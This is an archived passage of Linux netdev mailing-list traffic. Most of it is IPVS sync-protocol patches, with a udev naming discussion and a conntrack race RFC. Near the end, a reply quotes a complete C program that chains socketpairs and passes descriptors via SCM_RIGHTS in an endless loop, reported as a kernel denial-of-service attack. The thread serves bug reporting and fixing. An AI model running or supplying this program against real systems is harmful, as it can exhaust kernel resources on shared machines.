+		pkts = sysctl_ip_vs_sync_threshold[0];
+	else
+		pkts = atomic_add_return(1, &cp->in_pkts);
+
+	if ((ip_vs_sync_state & IP_VS_STATE_MASTER) &&
 	    cp->protocol == IPPROTO_SCTP) {
 		if ((cp->state == IP_VS_SCTP_S_ESTABLISHED &&
 			(pkts % sysctl_ip_vs_sync_threshold[1]
@@ -1577,8 +1583,7 @@ ip_vs_in(unsigned int hooknum, struct sk_buff *skb, int af)
 	}
 
 	/* Keep this block last: TCP and others with pp->num_states <= 1 */
-	else if (af == AF_INET &&
-	    (ip_vs_sync_state & IP_VS_STATE_MASTER) &&
+	else if ((ip_vs_sync_state & IP_VS_STATE_MASTER) &&
 	    (((cp->protocol != IPPROTO_TCP ||
 	       cp->state == IP_VS_TCP_S_ESTABLISHED) &&
 	      (pkts % sysctl_ip_vs_sync_threshold[1]
diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index e071508..df5abf0 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -226,7 +226,7 @@ struct ip_vs_sync_thread_data {
 #define MAX_CONNS_PER_SYNCBUFF	255 /* nr_conns in ip_vs_sync_mesg is 8 bit */
 
 /* Version 0 header */
-struct ip_vs_sync_mesg {
+struct ip_vs_sync_mesg_v0 {
 	__u8                    nr_conns;
 	__u8                    syncid;
 	__u16                   size;
@@ -235,7 +235,7 @@ struct ip_vs_sync_mesg {
 };
 
 /* Version 1 header */
-struct ip_vs_sync_mesg_v2 {
+struct ip_vs_sync_mesg {
 	__u8			reserved;	/* must be zero */
 	__u8			syncid;
 	__u16			size;
@@ -299,6 +299,17 @@ static void ntoh_seq(struct ip_vs_seq *no, struct ip_vs_seq *ho)
 	ho->previous_delta = get_unaligned_be32(&no->previous_delta);
 }
 
+/*
+ * Copy of struct ip_vs_seq
+ * From Aligned host order to unaligned network order
+ */
+static void hton_seq(struct ip_vs_seq *ho, struct ip_vs_seq *no)
+{
+	put_unaligned_be32(ho->init_seq, &no->init_seq);
+	put_unaligned_be32(ho->delta, &no->delta);
+	put_unaligned_be32(ho->previous_delta, &no->previous_delta);
+}
+
 static inline struct ip_vs_sync_buff *sb_dequeue(void)
 {
 	struct ip_vs_sync_buff *sb;
@@ -317,6 +328,9 @@ static inline struct ip_vs_sync_buff *sb_dequeue(void)
 	return sb;
 }
 
+/*
+ * Create a new sync buffer for Version 1 proto.
+ */
 static inline struct ip_vs_sync_buff * ip_vs_sync_buff_create(void)
 {
 	struct ip_vs_sync_buff *sb;
@@ -328,11 +342,15 @@ static inline struct ip_vs_sync_buff * ip_vs_sync_buff_create(void)
 		kfree(sb);
 		return NULL;
 	}
-	sb->mesg->nr_conns = 0;
+	sb->mesg->reserved = 0;  /* old nr_conns i.e. must be zeo now */
+	sb->mesg->version = SYNC_PROTO_VER;
 	sb->mesg->syncid = ip_vs_master_syncid;
-	sb->mesg->size = 4;
-	sb->head = (unsigned char *)sb->mesg + 4;
+	sb->mesg->size = sizeof(struct ip_vs_sync_mesg);
+	sb->mesg->nr_conns = 0;
+	sb->mesg->spare = 0;
+	sb->head = (unsigned char *)sb->mesg + sizeof(struct ip_vs_sync_mesg);
 	sb->end = (unsigned char *)sb->mesg + sync_send_mesg_maxlen;
+
 	sb->firstuse = jiffies;
 	return sb;
 }
@@ -373,18 +391,60 @@ get_curr_sync_buff(unsigned long time)
 	return sb;
 }
 
-
 /*
  *      Add an ip_vs_conn information into the current sync_buff.
  *      Called by ip_vs_in.
+ *      Sending Version 1 messages
  */
-void ip_vs_sync_conn(const struct ip_vs_conn *cp)
+void ip_vs_sync_conn(struct ip_vs_conn *cp)
 {
 	struct ip_vs_sync_mesg *m;
-	struct ip_vs_sync_conn_v0 *s;
-	int len;
+	union ip_vs_sync_conn *s;
+	__u8 *p;
+	unsigned int len, pe_name_len, pad;
+
+	/* Do not sync ONE PACKET */
+	if (cp->flags & IP_VS_CONN_F_ONE_PACKET)
+		goto control;
+sloop:
+	/* Sanity checks */
+	pe_name_len = 0;
+	if (cp->pe_data_len) {
+		if (!cp->pe_data || !cp->dest) {
+			IP_VS_ERR_RL("SYNC, connection pe_data invalid\n");
+			return;
+		}
+		pe_name_len = strnlen(cp->pe->name, IP_VS_PENAME_MAXLEN);
+	}
 
 	spin_lock(&curr_sb_lock);
+
+#ifdef CONFIG_IP_VS_IPV6
+	if (cp->af == AF_INET6)
+		len = sizeof(struct ip_vs_sync_v6);
+	else
+#endif
+		len = sizeof(struct ip_vs_sync_v4);
+
+	if (cp->flags & IP_VS_CONN_F_SEQ_MASK)
+		len += sizeof(struct ip_vs_sync_conn_options) + 2;
+
+	if (cp->pe_data_len)
+		len += cp->pe_data_len + 2;	/* + Param hdr field */
+	if (pe_name_len)
+		len += pe_name_len + 2;
+
+	/* check if there is a space for this one  */
+	pad = 0;
+	if (curr_sb) {
+		pad = (4 - (size_t)curr_sb->head) & 3;
+		if (curr_sb->head + len + pad > curr_sb->end) {
+			sb_queue_tail(curr_sb);
+			curr_sb = NULL;
+			pad = 0;
+		}
+	}
+
 	if (!curr_sb) {
 		if (!(curr_sb=ip_vs_sync_buff_create())) {
 			spin_unlock(&curr_sb_lock);
@@ -393,41 +453,84 @@ void ip_vs_sync_conn(const struct ip_vs_conn *cp)
 		}
 	}
 
-	len = (cp->flags & IP_VS_CONN_F_SEQ_MASK) ? FULL_CONN_SIZE :
-		SIMPLE_CONN_SIZE;
 	m = curr_sb->mesg;
-	s = (struct ip_vs_sync_conn_v0 *)curr_sb->head;
-
-	/* copy members */
-	s->protocol = cp->protocol;
-	s->cport = cp->cport;
-	s->vport = cp->vport;
-	s->dport = cp->dport;
-	s->caddr = cp->caddr.ip;
-	s->vaddr = cp->vaddr.ip;
-	s->daddr = cp->daddr.ip;
-	s->flags = htons(cp->flags & ~IP_VS_CONN_F_HASHED);
-	s->state = htons(cp->state);
-	if (cp->flags & IP_VS_CONN_F_SEQ_MASK) {
-		struct ip_vs_sync_conn_options *opt =
-			(struct ip_vs_sync_conn_options *)&s[1];
-		memcpy(opt, &cp->in_seq, sizeof(*opt));
-	}
-
+	p = curr_sb->head;
+	curr_sb->head += pad + len;
+	m->size += pad + len;
+	/* Add ev. padding from prev. sync_conn */
+	while (pad--)
+		*(p++) = 0;
+
+	s = (union ip_vs_sync_conn *)p;
+
+	/* Set message type  & copy members */
+	s->v4.type = (cp->af == AF_INET6 ? STYPE_F_INET6 : 0);
+	s->v4.ver_size = htons(len & SVER_MASK);	/* Version 0 */
+	s->v4.flags = htonl(cp->flags & ~IP_VS_CONN_F_HASHED);
+	s->v4.state = htons(cp->state);
+	s->v4.protocol = cp->protocol;
+	s->v4.cport = cp->cport;
+	s->v4.vport = cp->vport;
+	s->v4.dport = cp->dport;
+	s->v4.fwmark = htonl(cp->fwmark);
+	s->v4.timeout = htonl(cp->timeout / HZ);
 	m->nr_conns++;
-	m->size += len;
-	curr_sb->head += len;
 
-	/* check if there is a space for next one */
-	if (curr_sb->head+FULL_CONN_SIZE > curr_sb->end) {
-		sb_queue_tail(curr_sb);
-		curr_sb = NULL;
+#ifdef CONFIG_IP_VS_IPV6
+	if (cp->af == AF_INET6) {
+		p += sizeof(struct ip_vs_sync_v6);
+		ipv6_addr_copy(&s->v6.caddr, &cp->caddr.in6);
+		ipv6_addr_copy(&s->v6.vaddr, &cp->vaddr.in6);
+		ipv6_addr_copy(&s->v6.daddr, &cp->daddr.in6);
+	} else
+#endif
+	{
+		p += sizeof(struct ip_vs_sync_v4);	/* options ptr */
+		s->v4.caddr = cp->caddr.ip;
+		s->v4.vaddr = cp->vaddr.ip;
+		s->v4.daddr = cp->daddr.ip;
+	}
+	if (cp->flags & IP_VS_CONN_F_SEQ_MASK) {
+		*(p++) = IPVS_OPT_SEQ_DATA;
+		*(p++) = sizeof(struct ip_vs_sync_conn_options);
+		hton_seq((struct ip_vs_seq *)p, &cp->in_seq);
+		p += sizeof(struct ip_vs_seq);
+		hton_seq((struct ip_vs_seq *)p, &cp->out_seq);
+		p += sizeof(struct ip_vs_seq);
 	}
+	/* Handle pe data */
+	if (cp->pe_data_len && cp->pe_data) {
+		*(p++) = IPVS_OPT_PE_DATA;
+		*(p++) = cp->pe_data_len;
+		memcpy(p, cp->pe_data, cp->pe_data_len);
+		p += cp->pe_data_len;
+		if (pe_name_len) {
+			/* Add PE_NAME */
+			*(p++) = IPVS_OPT_PE_NAME;
+			*(p++) = pe_name_len;
+			memcpy(p, cp->pe->name, pe_name_len);
+			p += pe_name_len;
+		}
+	}
+
 	spin_unlock(&curr_sb_lock);
 
+control:
 	/* synchronize its controller if it has */
-	if (cp->control)
-		ip_vs_sync_conn(cp->control);
+	cp = cp->control;
+	if (!cp)
+		return;
+	/*
+	 * Reduce sync rate for templates
+	 * i.e only increment in_pkts for Templates.
+	 */
+	if (cp->flags & IP_VS_CONN_F_TEMPLATE) {
+		int pkts = atomic_add_return(1, &cp->in_pkts);
+
+		if (pkts % sysctl_ip_vs_sync_threshold[1] != 1)
+			return;
+	}
+	goto sloop;
 }
 
 /*
@@ -596,7 +699,7 @@ static void ip_vs_proc_conn(struct ip_vs_conn_param *param,  unsigned flags,
  */
 static void ip_vs_process_message_v0(const char *buffer, const size_t buflen)
 {
-	struct ip_vs_sync_mesg *m = (struct ip_vs_sync_mesg *)buffer;
+	struct ip_vs_sync_mesg_v0 *m = (struct ip_vs_sync_mesg_v0 *)buffer;
 	struct ip_vs_sync_conn_v0 *s;
 	struct ip_vs_sync_conn_options *opt;
 	struct ip_vs_protocol *pp;
@@ -604,7 +707,7 @@ static void ip_vs_process_message_v0(const char *buffer, const size_t buflen)
 	char *p;
 	int i;
 
-	p = (char *)buffer + sizeof(struct ip_vs_sync_mesg);
+	p = (char *)buffer + sizeof(struct ip_vs_sync_mesg_v0);
 	for (i=0; i<m->nr_conns; i++) {
 		unsigned flags, state;
 
@@ -848,11 +951,11 @@ out:
  */
 static void ip_vs_process_message(__u8 *buffer, const size_t buflen)
 {
-	struct ip_vs_sync_mesg_v2 *m2 = (struct ip_vs_sync_mesg_v2 *)buffer;
+	struct ip_vs_sync_mesg *m2 = (struct ip_vs_sync_mesg *)buffer;
 	__u8 *p, *msg_end;
-	unsigned int i, nr_conns;
+	int i, nr_conns;
 
-	if (buflen < sizeof(struct ip_vs_sync_mesg)) {
+	if (buflen < sizeof(struct ip_vs_sync_mesg_v0)) {
 		IP_VS_DBG(2, "BACKUP, message header too short\n");
 		return;
 	}
@@ -872,7 +975,7 @@ static void ip_vs_process_message(__u8 *buffer, const size_t buflen)
 	if ((m2->version == SYNC_PROTO_VER) && (m2->reserved == 0)
 	    && (m2->spare == 0)) {
 
-		msg_end = buffer + sizeof(struct ip_vs_sync_mesg_v2);
+		msg_end = buffer + sizeof(struct ip_vs_sync_mesg);
 		nr_conns = m2->nr_conns;
 
 		for (i=0; i<nr_conns; i++) {
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 8/8] IPVS: Backup, adding version 0 sending capabilities
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

This patch adds a sysclt net.ipv4.vs.sync_version
that can be used to send sync msg in version 0 or 1 format.

sync_version value is logical,
     Value 1 (default) New version
           0 Plain old version

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 include/net/ip_vs.h             |    2 +
 net/netfilter/ipvs/ip_vs_ctl.c  |   28 ++++++++-
 net/netfilter/ipvs/ip_vs_sync.c |  134 +++++++++++++++++++++++++++++++++++++++
 3 files changed, 163 insertions(+), 1 deletions(-)

diff --git a/include/net/ip_vs.h b/include/net/ip_vs.h
index a715f3d..d858264 100644
--- a/include/net/ip_vs.h
+++ b/include/net/ip_vs.h
@@ -883,7 +883,9 @@ extern int sysctl_ip_vs_conntrack;
 extern int sysctl_ip_vs_snat_reroute;
 extern struct ip_vs_stats ip_vs_stats;
 extern const struct ctl_path net_vs_ctl_path[];
+extern int sysctl_ip_vs_sync_ver;
 
+extern void ip_vs_sync_switch_mode(int mode);
 extern struct ip_vs_service *
 ip_vs_service_get(int af, __u32 fwmark, __u16 protocol,
 		  const union nf_inet_addr *vaddr, __be16 vport);
diff --git a/net/netfilter/ipvs/ip_vs_ctl.c b/net/netfilter/ipvs/ip_vs_ctl.c
index a5bd002..d12a13c 100644
--- a/net/netfilter/ipvs/ip_vs_ctl.c
+++ b/net/netfilter/ipvs/ip_vs_ctl.c
@@ -92,7 +92,7 @@ int sysctl_ip_vs_nat_icmp_send = 0;
 int sysctl_ip_vs_conntrack;
 #endif
 int sysctl_ip_vs_snat_reroute = 1;
-
+int sysctl_ip_vs_sync_ver = 1;		/* Default version of sync proto */
 
 #ifdef CONFIG_IP_VS_DEBUG
 static int sysctl_ip_vs_debug_level = 0;
@@ -1536,6 +1536,25 @@ proc_do_sync_threshold(ctl_table *table, int write,
 	return rc;
 }
 
+static int
+proc_do_sync_mode(ctl_table *table, int write,
+		     void __user *buffer, size_t *lenp, loff_t *ppos)
+{
+	int *valp = table->data;
+	int val = *valp;
+	int rc;
+
+	rc = proc_dointvec(table, write, buffer, lenp, ppos);
+	if (write && (*valp != val)) {
+		if ((*valp < 0) || (*valp > 1)) {
+			/* Restore the correct value */
+			*valp = val;
+		} else {
+			ip_vs_sync_switch_mode(val);
+		}
+	}
+	return rc;
+}
 
 /*
  *	IPVS sysctl table (under the /proc/sys/net/ipv4/vs/)
@@ -1602,6 +1621,13 @@ static struct ctl_table vs_vars[] = {
 		.mode		= 0644,
 		.proc_handler	= &proc_dointvec,
 	},
+	{
+		.procname	= "sync_version",
+		.data		= &sysctl_ip_vs_sync_ver,
+		.maxlen		= sizeof(int),
+		.mode		= 0644,
+		.proc_handler	= &proc_do_sync_mode,
+	},
 #if 0
 	{
 		.procname	= "timeout_established",
diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
index df5abf0..c1c167a 100644
--- a/net/netfilter/ipvs/ip_vs_sync.c
+++ b/net/netfilter/ipvs/ip_vs_sync.c
@@ -5,6 +5,18 @@
  *              high-performance and highly available server based on a
  *              cluster of servers.
  *
+ * Version 1,   is capable of handling both version 0 and 1 messages.
+ *              Version 0 is the plain old format.
+ *              Note Version 0 receivers will just drop Ver 1 messages.
+ *              Version 1 is capable of handle IPv6, Persistence data,
+ *              time-outs, and firewall marks.
+ *              In ver.1 "ip_vs_sync_conn_options" will be sent in netw. order.
+ *              Ver. 0 can be turned on by sysctl -w net.ipv4.vs.sync_version=0
+ *
+ * Definitions  Message: is a complete datagram
+ *              Sync_conn: is a part of a Message
+ *              Param Data is an option to a Sync_conn.
+ *
  * Authors:     Wensong Zhang <wensong@linuxvirtualserver.org>
  *
  * ip_vs_sync:  sync connection info from master load balancer to backups
@@ -15,6 +27,8 @@
  *	Alexandre Cassen	:	Added SyncID support for incoming sync
  *					messages filtering.
  *	Justin Ossevoort	:	Fix endian problem on sync message size.
+ *	Hans Schillstrom	:	Added Version 1: i.e. IPv6,
+ *					Persistence support, fwmark and time-out.
  */
 
 #define KMSG_COMPONENT "IPVS"
@@ -392,6 +406,121 @@ get_curr_sync_buff(unsigned long time)
 }
 
 /*
+ * Switch mode from sending version 0 or 1
+ *  - must handle sync_buf
+ */
+void ip_vs_sync_switch_mode(int mode) {
+
+	if (!ip_vs_sync_state & IP_VS_STATE_MASTER)
+		return;
+	if (mode == sysctl_ip_vs_sync_ver || !curr_sb)
+		return;
+
+	spin_lock_bh(&curr_sb_lock);
+	/* Buffer empty ? then let buf_create do the job  */
+	if ( curr_sb->mesg->size <=  sizeof(struct ip_vs_sync_mesg)) {
+		kfree(curr_sb);
+		curr_sb = NULL;
+	} else {
+		spin_lock_bh(&ip_vs_sync_lock);
+		if (ip_vs_sync_state & IP_VS_STATE_MASTER)
+			list_add_tail(&curr_sb->list, &ip_vs_sync_queue);
+		else
+			ip_vs_sync_buff_release(curr_sb);
+		spin_unlock_bh(&ip_vs_sync_lock);
+	}
+	spin_unlock_bh(&curr_sb_lock);
+}
+
+/*
+ * Create a new sync buffer for Version 0 proto.
+ */
+static inline struct ip_vs_sync_buff * ip_vs_sync_buff_create_v0(void)
+{
+	struct ip_vs_sync_buff *sb;
+	struct ip_vs_sync_mesg_v0 *mesg;
+
+	if (!(sb=kmalloc(sizeof(struct ip_vs_sync_buff), GFP_ATOMIC)))
+		return NULL;
+
+	if (!(sb->mesg=kmalloc(sync_send_mesg_maxlen, GFP_ATOMIC))) {
+		kfree(sb);
+		return NULL;
+	}
+	mesg = (struct ip_vs_sync_mesg_v0 *)sb->mesg;
+	mesg->nr_conns = 0;
+	mesg->syncid = ip_vs_master_syncid;
+	mesg->size = 4;
+	sb->head = (unsigned char *)mesg + 4;
+	sb->end = (unsigned char *)mesg + sync_send_mesg_maxlen;
+	sb->firstuse = jiffies;
+	return sb;
+}
+
+/*
+ *      Version 0 , could be switched in by sys_ctl.
+ *      Add an ip_vs_conn information into the current sync_buff.
+ */
+void ip_vs_sync_conn_v0(struct ip_vs_conn *cp)
+{
+	struct ip_vs_sync_mesg_v0 *m;
+	struct ip_vs_sync_conn_v0 *s;
+	int len;
+
+	if (unlikely(cp->af != AF_INET))
+		return;
+	/* Do not sync ONE PACKET */
+	if (cp->flags & IP_VS_CONN_F_ONE_PACKET)
+		return;
+
+	spin_lock(&curr_sb_lock);
+	if (!curr_sb) {
+		if (!(curr_sb=ip_vs_sync_buff_create_v0())) {
+			spin_unlock(&curr_sb_lock);
+			pr_err("ip_vs_sync_buff_create failed.\n");
+			return;
+		}
+	}
+
+	len = (cp->flags & IP_VS_CONN_F_SEQ_MASK) ? FULL_CONN_SIZE :
+		SIMPLE_CONN_SIZE;
+	m = (struct ip_vs_sync_mesg_v0 *)curr_sb->mesg;
+	s = (struct ip_vs_sync_conn_v0 *)curr_sb->head;
+
+	/* copy members */
+	s->reserved = 0;
+	s->protocol = cp->protocol;
+	s->cport = cp->cport;
+	s->vport = cp->vport;
+	s->dport = cp->dport;
+	s->caddr = cp->caddr.ip;
+	s->vaddr = cp->vaddr.ip;
+	s->daddr = cp->daddr.ip;
+	s->flags = htons(cp->flags & ~IP_VS_CONN_F_HASHED);
+	s->state = htons(cp->state);
+	if (cp->flags & IP_VS_CONN_F_SEQ_MASK) {
+		struct ip_vs_sync_conn_options *opt =
+			(struct ip_vs_sync_conn_options *)&s[1];
+		memcpy(opt, &cp->in_seq, sizeof(*opt));
+	}
+
+	m->nr_conns++;
+	m->size += len;
+	curr_sb->head += len;
+
+	/* check if there is a space for next one */
+	if (curr_sb->head + FULL_CONN_SIZE > curr_sb->end) {
+		sb_queue_tail(curr_sb);
+		curr_sb = NULL;
+	}
+	spin_unlock(&curr_sb_lock);
+
+	/* synchronize its controller if it has */
+	if (cp->control)
+		ip_vs_sync_conn(cp->control);
+}
+
+/*
  *      Add an ip_vs_conn information into the current sync_buff.
  *      Called by ip_vs_in.
  *      Sending Version 1 messages
@@ -403,6 +532,11 @@ void ip_vs_sync_conn(struct ip_vs_conn *cp)
 	__u8 *p;
 	unsigned int len, pe_name_len, pad;
 
+	/* Handle old version of the protocol */
+	if (sysctl_ip_vs_sync_ver == 0) {
+		ip_vs_sync_conn_v0(cp);
+		return;
+	}
 	/* Do not sync ONE PACKET */
 	if (cp->flags & IP_VS_CONN_F_ONE_PACKET)
 		goto control;
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 2/8] IPVS: Split ports[2] into src_port and dst_port
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

Avoid sending invalid pointer due to skb_linearize() call.
This patch prepares for next patch where skb_linearize is a part.

In ip_vs_sched_persist() params the ports ptr will be replaced by
src and dst port.

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 net/netfilter/ipvs/ip_vs_core.c |   21 +++++++++++----------
 1 files changed, 11 insertions(+), 10 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_core.c b/net/netfilter/ipvs/ip_vs_core.c
index e2bb3cd..9acdd79 100644
--- a/net/netfilter/ipvs/ip_vs_core.c
+++ b/net/netfilter/ipvs/ip_vs_core.c
@@ -200,7 +200,7 @@ ip_vs_conn_fill_param_persist(const struct ip_vs_service *svc,
 static struct ip_vs_conn *
 ip_vs_sched_persist(struct ip_vs_service *svc,
 		    struct sk_buff *skb,
-		    __be16 ports[2])
+		    __be16 src_port, __be16 dst_port)
 {
 	struct ip_vs_conn *cp = NULL;
 	struct ip_vs_iphdr iph;
@@ -224,8 +224,8 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 
 	IP_VS_DBG_BUF(6, "p-schedule: src %s:%u dest %s:%u "
 		      "mnet %s\n",
-		      IP_VS_DBG_ADDR(svc->af, &iph.saddr), ntohs(ports[0]),
-		      IP_VS_DBG_ADDR(svc->af, &iph.daddr), ntohs(ports[1]),
+		      IP_VS_DBG_ADDR(svc->af, &iph.saddr), ntohs(src_port),
+		      IP_VS_DBG_ADDR(svc->af, &iph.daddr), ntohs(dst_port),
 		      IP_VS_DBG_ADDR(svc->af, &snet));
 
 	/*
@@ -247,14 +247,14 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 		const union nf_inet_addr fwmark = { .ip = htonl(svc->fwmark) };
 		__be16 vport = 0;
 
-		if (ports[1] == svc->port) {
+		if (dst_port == svc->port) {
 			/* non-FTP template:
 			 * <protocol, caddr, 0, vaddr, vport, daddr, dport>
 			 * FTP template:
 			 * <protocol, caddr, 0, vaddr, 0, daddr, 0>
 			 */
 			if (svc->port != FTPPORT)
-				vport = ports[1];
+				vport = dst_port;
 		} else {
 			/* Note: persistent fwmark-based services and
 			 * persistent port zero service are handled here.
@@ -285,7 +285,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 			return NULL;
 		}
 
-		if (ports[1] == svc->port && svc->port != FTPPORT)
+		if (dst_port == svc->port && svc->port != FTPPORT)
 			dport = dest->port;
 
 		/* Create a template
@@ -306,7 +306,7 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 		kfree(param.pe_data);
 	}
 
-	dport = ports[1];
+	dport = dst_port;
 	if (dport == svc->port && dest->port)
 		dport = dest->port;
 
@@ -317,8 +317,9 @@ ip_vs_sched_persist(struct ip_vs_service *svc,
 	/*
 	 *    Create a new connection according to the template
 	 */
-	ip_vs_conn_fill_param(svc->af, iph.protocol, &iph.saddr, ports[0],
-			      &iph.daddr, ports[1], &param);
+	ip_vs_conn_fill_param(svc->af, iph.protocol, &iph.saddr, src_port,
+			      &iph.daddr, dst_port, &param);
+
 	cp = ip_vs_conn_new(&param, &dest->addr, dport, flags, dest, skb->mark);
 	if (cp == NULL) {
 		ip_vs_conn_put(ct);
@@ -388,7 +389,7 @@ ip_vs_schedule(struct ip_vs_service *svc, struct sk_buff *skb,
 	 */
 	if (svc->flags & IP_VS_SVC_F_PERSISTENT) {
 		*ignored = 0;
-		return ip_vs_sched_persist(svc, skb, pptr);
+		return ip_vs_sched_persist(svc, skb, pptr[0], pptr[1]);
 	}
 
 	/*
-- 
1.7.2.3


^ permalink raw reply related

* [PATCH 3/8] IPVS: skb defrag in L7 helpers
From: Simon Horman @ 2010-11-25  1:46 UTC (permalink / raw)
  To: lvs-devel, netdev, netfilter, netfilter-devel
  Cc: Hans Schillstrom, Julian Anastasov, Patrick McHardy, Simon Horman
In-Reply-To: <1290649618-18955-1-git-send-email-horms@verge.net.au>

From: Hans Schillstrom <hans.schillstrom@ericsson.com>

L7 helpers like sip needs skb defrag
since L7 data can be fragmented.

This patch requires "IPVS Break ports-2 into src_port and dst_port" patch

Signed-off-by: Hans Schillstrom <hans.schillstrom@ericsson.com>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
---
 net/netfilter/ipvs/ip_vs_pe_sip.c |    3 +++
 1 files changed, 3 insertions(+), 0 deletions(-)

diff --git a/net/netfilter/ipvs/ip_vs_pe_sip.c b/net/netfilter/ipvs/ip_vs_pe_sip.c
index b8b4e96..0d83bc0 100644
--- a/net/netfilter/ipvs/ip_vs_pe_sip.c
+++ b/net/netfilter/ipvs/ip_vs_pe_sip.c
@@ -71,6 +71,7 @@ ip_vs_sip_fill_param(struct ip_vs_conn_param *p, struct sk_buff *skb)
 	struct ip_vs_iphdr iph;
 	unsigned int dataoff, datalen, matchoff, matchlen;
 	const char *dptr;
+	int retc;
 
 	ip_vs_fill_iphdr(p->af, skb_network_header(skb), &iph);
 
@@ -83,6 +84,8 @@ ip_vs_sip_fill_param(struct ip_vs_conn_param *p, struct sk_buff *skb)
 	if (dataoff >= skb->len)
 		return -EINVAL;
 
+	if ((retc=skb_linearize(skb)) < 0)
+		return retc;
 	dptr = skb->data + dataoff;
 	datalen = skb->len - dataoff;
 
-- 
1.7.2.3


^ permalink raw reply related

* Re: [PATCH 1/1] UDEV - Add 'udevlom' command line param to start_udev
From: Bill Fink @ 2010-11-25  2:56 UTC (permalink / raw)
  To: Loke, Chetan
  Cc: Rick Jones, Ben Hutchings, Matt Domsch, Greg KH, K, Narendra,
	linux-hotplug, netdev, Hargrave, Jordan, Rose, Charles
In-Reply-To: <D3F292ADF945FB49B35E96C94C2061B90E4E367E@nsmail.netscout.com>

On Wed, 24 Nov 2010, Loke, Chetan wrote:

> > Are folks sufficently confident that using anything other than "eth"
> > won't cause some unpleasant "our app always ass-u-me-d interfaces
> started with
> > 'eth'" situations?
> 
> Good point. I'm sure folks use 'eth' in their regex filters. Please
> ignore my obe/obn email.

If the 2 or 3 character name isn't a hard requirement, then
ethm for eth(ernet on )m(otherboard) would seem a natural
possibility.

					-Bill

^ permalink raw reply

* [RFC] netfilter: conntrack race between dump_table and destroy
From: Stephen Hemminger @ 2010-11-25  6:27 UTC (permalink / raw)
  To: Patrick McHardy, Paul E. McKenney; +Cc: netdev, netfilter-devel

A customer reported a crash and the backtrace showed that
ctnetlink_dump_table was running while a conntrack entry was
being destroyed.  It looks like the code for walking the table
with hlist_nulls_for_each_entry_rcu is not correctly handling the
case where it finds a deleted entry.

According to RCU documentation, when using hlist_nulls the reader
must handle the case of seeing a deleted entry and not proceed
further down the linked list.  For lookup the correct behavior would
be to restart the scan, but that would generate duplicate entries.

This patch is the simplest one of three alternatives:
  1) if dead entry detected, skip the rest of the hash chain (see below)
  2) remember skb location at start of hash chain and rescan that chain
  3) switch to using a full lock when scanning rather than RCU.
It all depends on the amount of effort versus consistency of results.

Signed-off-by: Stephen Hemminger <shemminger@vyatta.com>

--- a/net/netfilter/nf_conntrack_netlink.c	2010-11-24 14:11:27.661682148 -0800
+++ b/net/netfilter/nf_conntrack_netlink.c	2010-11-24 14:22:28.431980247 -0800
@@ -651,8 +651,12 @@ restart:
 			if (NF_CT_DIRECTION(h) != IP_CT_DIR_ORIGINAL)
 				continue;
 			ct = nf_ct_tuplehash_to_ctrack(h);
+
+			/* if entry is being deleted then can not proceed
+			 * past this point. */
 			if (!atomic_inc_not_zero(&ct->ct_general.use))
-				continue;
+				break;
+
 			/* Dump entries of a given L3 protocol number.
 			 * If it is not specified, ie. l3proto == 0,
 			 * then dump everything. */

^ permalink raw reply

* Re: Simple kernel attack using socketpair. easy, 100% reproductiblle, works under guest. no way to protect :(
From: Eric Dumazet @ 2010-11-25  6:28 UTC (permalink / raw)
  To: Марк Коренберг
  Cc: linux-kernel, netdev, David Miller
In-Reply-To: <AANLkTikCeddPFRGojPGuB6oq3xGYgovtm8r4=WhjEDpe@mail.gmail.com>

Le jeudi 25 novembre 2010 à 10:57 +0500, Марк Коренберг a écrit :
> #include <sys/socket.h>
> #include <sys/un.h>
> 
> static int send_fd (int unix_fd, int fd)
> {
>   struct msghdr msgh;
>   struct cmsghdr *cmsg;
>   char buf[CMSG_SPACE (sizeof (fd))];
> 
>   memset (&msgh, 0, sizeof (msgh));
>   memset (buf, 0, sizeof (buf));
> 
>   msgh.msg_control = buf;
>   msgh.msg_controllen = sizeof (buf);
> 
>   cmsg = CMSG_FIRSTHDR (&msgh);
>   cmsg->cmsg_len = CMSG_LEN (sizeof (fd));
>   cmsg->cmsg_level = SOL_SOCKET;
>   cmsg->cmsg_type = SCM_RIGHTS;
> 
>   msgh.msg_controllen = cmsg->cmsg_len;
> 
>   memcpy (CMSG_DATA (cmsg), &fd, sizeof (fd));
>   return sendmsg (unix_fd, &msgh, 0);
> }
> 
> 
> int main ()
> {
>   int fd[2], ff[2];
>   int target;
> 
>   if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd)==-1)
>     return 1;
> 
>   for (;;)
>   {
>     if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff)==-1)
>         return 2;
>     send_fd (ff[0], fd[0]);
>     send_fd (ff[0], fd[1]);
>     close (fd[1]);
>     close (fd[0]);
>     fd[0] = ff[0];
>     fd[1] = ff[1];
>   }
> } 


Since you obviously read recent mails on this subject yesterday, why
dont you Cc netdev ?

There is a very easy way to protect against this actually.

